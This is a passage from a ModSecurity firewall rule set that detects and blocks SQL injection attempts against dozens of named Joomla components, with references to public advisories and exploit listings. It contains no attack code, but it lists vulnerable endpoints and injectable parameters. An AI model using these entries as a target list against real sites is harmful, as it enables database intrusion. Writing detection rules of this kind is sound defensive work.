UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:where/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005431,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:where/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005437,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005443) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005443,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005449) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005449,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule &TX:'/SQL_INJECTION.*ARGS:option=com_djcatalog&view=showItem&id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule &TX:'/SQL_INJECTION.*ARGS:option=com_jlord_rss&task=feed&id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009942,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009947,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009960,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010017,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010044,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010353,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:&category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010480,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:&pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010559,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:treeId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010640,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:Id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010714,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:idea_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010754,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:Id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010809) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010809,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010842,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010857,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id_job/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010928,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010985) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010985,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011005,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011026,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011081,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:face_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN 